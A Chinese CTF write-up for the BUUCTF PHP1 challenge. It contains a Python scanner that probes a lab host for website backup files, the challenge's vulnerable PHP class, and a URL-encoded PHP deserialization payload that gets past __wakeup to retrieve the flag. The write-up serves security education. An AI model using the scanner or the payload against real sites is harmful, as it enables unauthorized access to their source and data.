[极客大挑战 2019]PHP1

最新推荐文章于 2024-04-26 20:34:17 发布
最新推荐文章于 2024-04-26 20:34:17 发布
阅读量51 收藏
点赞数 1
分类专栏: BUUCTF web题 文章标签: 安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whale_waves/article/details/133851747
版权

提示

  • 备份文件下载(需要写些脚本或者手动或者用工具扫)
  • php代码审计
  • php反序列化
  • php魔法函数

提示说有一份网站备份文件

可以用工具扫,但是要扫那么会儿写一个简单python脚本跑要方便点

import requests as rt

webname = {'web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp', 'db', 'data', 'code', 'test', 'admin', 'user', 'sql'}
weblist = {'.rar', '.zip', '.7z', '.tar.gz', '.bak', '.txt', '.old', '.temp', '_index.html', '.swp', '.sql', '.tgz', '.tar'}

for i in webname:
    for k in weblist:
        url = f'http://d9b53d59-0a31-41a0-b879-7c8e70be3989.node4.buuoj.cn:81/{i}{k}'
        re = rt.get(url)
        if re.status_code == 200:
            print(i, k)
            print(re.status_code)
            break

看来是有一个www.zip文件

访问下载

获得flag.php(这个是假的)

index.php

unserialize看来这题和反序列化有关了

class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

当开始反序列化之前将username赋值为guest(wakeup是魔法函数在执行unserialize之前会执行这个)

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }

当执行unserialize以后会执行,password必须等于100,username必须等于admin才会输出flag(destruct也是魔法函数,对象被销毁的时候执行)
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

这里需要绕过wakeup函数并且给password和username赋值

wakeup当内容与个数不匹配时不会执行

例如

O:4:"TEST":3:{s:5:"test1";s:2:"11";s:11:" TEST test2";s:2:"22";s:8:" * test3";s:2:"33";}

改为

O:4:"TEST":4:{s:5:"test1";s:2:"11";s:11:" TEST test2";s:2:"22";s:8:" * test3";s:2:"33";}

O代表类,然后后面4代表类名长度,接着双引号内是类名

然后是类中变量的个数:{类型:长度:"值";类型:长度:"值"...以此类推}

构造payload

<?php
class Name{
    private $username = 'admin';
    private $password = '100';
   }

echo serialize(new Name());
?>

获得

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

需要绕过wakeup所以改为

O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

因为里面有些url会表示为方格子,所以需要进行url编码在上传

最后payload:O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D

获得flag

怪兽不会rap_哥哥我会crash
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[极客挑战 2019]PHP1-原创超详细
qq_58166735的博客
12-09 3215
php反序列化根据__destruct 析构函数(在这个对象的内容执行完之前 执行函数的内容)的内容可以得知,password=100,username=admin的时候满足条件就可以获得flag。扫出来www.zip这个文件,然后下载下来 ,里面只有index.php和class.php两个文件有作用。(img-WxhXrNIn-1670552259273)]但是发现这个里面有空格,所以把空格url编码变成%00再传参。我用的是top7777.txt字典,扫的很慢。获得flag,实验结束。
[极客挑战 2019]PHP 1
qq_43618536的博客
07-02 472
BUUCTF的[极客挑战 2019]PHP 1 反序列化
BUUCTF-[极客挑战 2019]PHP1
Monica的博客
09-27 3731
目录 题目: 知识点: 分析: 方法: 题目: 知识点: 1. __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)我们可以通过一个cve来绕过:CVE-2016-7124。将Object中表示数量的字段改成比实际字段大的值即可绕过wakeup函数。条件:PHP5 < 5.6.25,PHP7 < 7.0.10,或者PHP 7.3.4 2. __construct() //当对象被创建即new之前,会触发进行初始化,但在unseri...
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
此文档描述的是2019年三诺集团四周年庆典的一项独特活动——“极客摇滚跑”。这是一场集科技、运动和音乐于一体的大型庆典,旨在庆祝三诺集团的周年纪念,并促进北海市高新产业园及其相关企业的交流与合作。活动的...
ISCC2019个人挑战赛题目练习
05-05
【ISCC2019个人挑战赛题目练习】是一次针对网络安全技术的竞赛,旨在提升参赛者在信息安全领域的技能和实战经验。此类挑战通常涵盖多种技术领域,包括但不限于密码学、漏洞分析、网络嗅探、逆向工程、Web安全以及...
极客与团队-极客与团队1
08-03
极客与团队》这本书由Brian W. Fitzpatrick和Ben Collins-Sussman共同撰写,两位作者来自Google,具有丰富的项目开发和管理经验,特别是在Subversion的开发中扮演了重要角色。这本书聚焦于软件开发中的非技术因素...
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
BUU CTF---[极客挑战 2019]PHP 1
weixin_46685211的博客
05-04 824
文章目录知识点一、备份网站二、代码审计1._wakeup()魔术方法2.GET方法3.类代码4.构造对象参考资料 知识点 1、PHP反序列化 2、绕过魔术方法 __wakeup() 一、备份网站 查看界面,提示备份网站。则搜索下载网站的备份文件。写一个程序遍历常见的备份文件网址,发现其中/www,zip的response为200 import requests url = "url地址" l1 = ['web', 'website', 'backup', 'back', 'www', 'wwwroot
BUUCTF-[极客挑战 2019]PHP 1
qq_57345310的博客
10-13 619
打开题目,首先是一只猫,真可爱。 首先我们根据题目提示,用dirsearch扫描目录。(按理说御剑也是可以的,但我没有尝试)但要注意,可能会扫不出来备份文件,多扫几次就出来了。如果没有dirsearch,上百度上搜,有很多安装教程和使用教程 最终我们扫到一个备份文件.www.zip 于是我们回到网页,拼接www.zip后就下载到了源码,解压后,可以看见里面有几个文件 但很可惜,flag.php文件里的flag是假的。但这里还是...
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
qq_51802152的博客
11-30 2438
[极客挑战 2019]PHP1全网最详细 纯小白也能看懂
BUUCTF——[极客挑战2019]PHP1
weixin_62248541的博客
11-25 236
BUUCTF——[极客挑战2019]PHP1
[buuoj]极客挑战 2019]PHP 1
qq_42250840的博客
06-28 1286
知识点: 1、直接扫描目录得到网站源码 2、public、protected与private在序列化时的区别 3、__wakeup()方法绕过 复现: 首先根据提示网站备份文件,考虑扫描备份文件 首先我们需要一个网站备份文件的爆破字典 可以用脚本实现: import sys import imp imp.reload(sys) import os import os.path import requests from urllib.parse import unquote suffixList = ['.
BUUCTF[极客挑战 2019]PHP1题解
最新发布
cxm4545的博客
04-26 777
想要得到flag,必须满足username===admin,password==100,于是我们就要绕过__wakeup()函数了。(Value是代码运行结果,这里要注意改一下参数个数以绕过__wakeup()函数)(1)进入靶机,我们看到网页提示:备份网站,这时候我们就应该想到有可能源码泄露了。很明显,用get传参,然后反序列化,其实这里就是一个反序列化的题目了。(5)在class.php中,我们观察一下这个Name类。(2)因此,写一个python脚本,扫描一下这个网站。(7)我们写一下代码。
[极客挑战 2019]PHP1 writeup
dlccom的博客
04-20 196
打开网站之后看到个小猫很可爱 右键查看网页源码发现
BUUCTF-web [极客挑战 2019]PHP1
zzqzzq11的博客
08-06 900
buuctf
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怪兽不会rap_哥哥我会crash

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值